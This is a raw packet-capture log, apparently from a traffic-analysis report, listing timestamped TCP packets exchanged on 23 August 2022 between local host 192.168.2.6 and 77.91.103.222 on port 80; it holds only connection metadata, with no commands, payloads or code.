                                                                                                                                                                      Aug 23, 2022 18:26:25.896755934 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:25.896800995 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:25.896836996 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:25.896857023 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:25.896903038 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:25.896907091 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:25.896955967 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:25.896990061 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:25.897017956 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:25.897039890 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:25.897044897 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:25.897059917 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:25.897072077 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:25.897097111 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:25.897099972 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:25.897118092 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:25.897142887 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:25.897147894 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:25.897185087 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:25.897193909 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:25.897228003 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:25.897274971 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:25.897303104 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:25.897325993 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:25.897329092 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:25.897352934 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:25.897353888 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:25.897375107 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:25.897376060 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:25.897397995 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:25.897397995 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:25.897449017 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:25.897454023 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:25.897469997 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:25.897495985 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:25.897550106 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:25.897573948 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:25.897574902 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:25.897598982 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:25.897620916 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:25.897627115 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:25.897660971 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:25.897670031 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:25.897710085 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:25.897711039 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:25.897737026 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:25.897757053 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:25.897778988 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:25.897782087 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:25.897804022 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:25.897825003 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:25.897829056 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:25.897852898 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:25.897869110 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:25.897875071 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:25.897896051 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:25.897918940 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:25.897921085 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:25.897947073 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:25.897958040 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:25.897970915 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:25.897980928 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:25.898001909 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:25.898026943 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:25.898075104 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:25.898101091 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:25.898124933 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:25.898133039 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:25.898149967 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:25.898155928 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:25.898175955 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:25.898192883 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:25.898200035 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:25.898217916 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:25.898225069 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:25.898272991 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:25.898298025 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:25.957124949 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:25.957170010 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:25.957192898 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:25.957202911 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:25.957216024 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:25.957236052 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:25.957240105 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:25.957247972 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:25.957263947 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:25.957269907 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:25.957283974 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:25.957292080 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:25.957304001 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:25.957318068 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:25.957333088 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:25.957341909 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:25.957367897 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:25.957372904 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:25.957384109 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:25.957392931 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:25.957406044 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:25.957441092 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:25.957544088 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:25.957592010 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:25.957613945 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:25.957654953 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:25.957859039 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:25.957885027 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:25.957909107 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:25.957931995 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:25.957936049 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:25.957951069 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:25.957954884 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:25.957992077 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:25.957995892 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:25.958053112 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:25.958062887 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:25.958081007 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:25.958096981 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:25.958125114 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:25.958139896 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:25.958168983 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:25.958189011 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:25.958214045 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:25.958234072 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:25.958246946 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:25.958273888 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:25.958275080 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:25.958293915 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:25.958317995 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:25.958359957 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:25.958403111 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:25.958414078 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:25.958447933 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:25.958496094 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:25.958523989 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:25.958550930 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:25.958556890 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:25.958583117 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:25.958607912 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:25.958611965 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:25.958633900 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:25.958667040 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:25.958687067 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:25.958731890 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:25.958759069 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:25.958795071 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:25.958801031 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:25.958827972 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:25.958852053 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:25.958872080 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:25.958875895 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:25.958898067 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:25.958925009 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:25.958942890 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:25.958951950 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:25.958976984 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:25.958977938 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:25.958993912 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:25.959005117 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:25.959018946 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:25.959055901 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:25.959247112 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:25.959311962 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:25.959328890 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:25.959383011 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:25.959444046 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:25.959517002 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:25.959647894 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:25.959700108 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:25.959748030 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:25.959772110 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:25.959799051 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:25.959830999 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:25.959841967 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:25.959846973 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:25.959922075 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:25.959928036 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:25.959955931 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:25.959978104 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:25.959990978 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:25.960129023 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:25.960155010 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:25.960175037 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:25.960195065 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:25.960336924 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:25.960365057 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:25.960382938 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:25.960398912 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:25.960438967 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:25.960483074 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:25.960486889 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:25.960520983 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:25.960558891 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:25.960602999 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:25.960856915 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:25.960882902 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:25.960927963 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:25.960954905 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:25.960999012 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:25.961039066 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:25.961049080 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:25.961081982 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:25.961086988 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:25.961112976 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:25.961126089 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:25.961152077 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:25.961182117 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:25.961231947 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:25.961246967 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:25.961276054 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:25.961291075 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:25.961317062 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:25.961447954 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:25.961504936 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:25.961525917 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:25.961575031 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:25.961602926 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:25.961659908 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:25.961688995 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:25.961714029 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:25.961731911 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:25.961755037 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:25.961755991 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:25.961796999 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:25.961797953 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:25.961822987 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:25.961839914 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:25.961847067 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:25.961863041 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:25.961888075 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:25.961918116 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:25.961958885 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:25.961966038 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:25.961983919 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:25.961996078 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:25.962009907 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:25.962023020 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:25.962038040 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:25.962049961 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:25.962080002 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:25.962080956 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:25.962121010 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:25.962163925 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:25.962203979 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:25.962209940 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:25.962246895 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:25.962248087 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:25.962275982 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:25.962290049 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:25.962301970 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:25.962320089 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:25.962328911 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:25.962342978 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:25.962353945 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:25.962368011 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:25.962395906 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:25.962397099 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:25.962436914 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:25.962438107 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:25.962476969 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:25.962495089 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:25.962522030 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:25.962542057 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:25.962560892 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:25.962563038 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:25.962601900 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:25.962603092 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:25.962627888 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:25.962656975 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:25.962676048 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:25.962683916 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:25.962728024 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:25.962754965 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:25.962796926 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:25.962804079 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:25.962836981 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:25.962838888 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:25.962862015 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:25.962882042 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:25.962905884 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:25.962915897 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:25.962940931 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:25.962956905 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:25.962982893 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:25.962996006 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:25.963038921 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:25.963040113 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:25.963063955 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:25.963087082 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:25.963095903 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:25.963119984 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:25.963160038 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:25.963165998 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:25.963182926 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:25.963211060 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:25.963222980 CEST4983380192.168.2.677.91.103.222
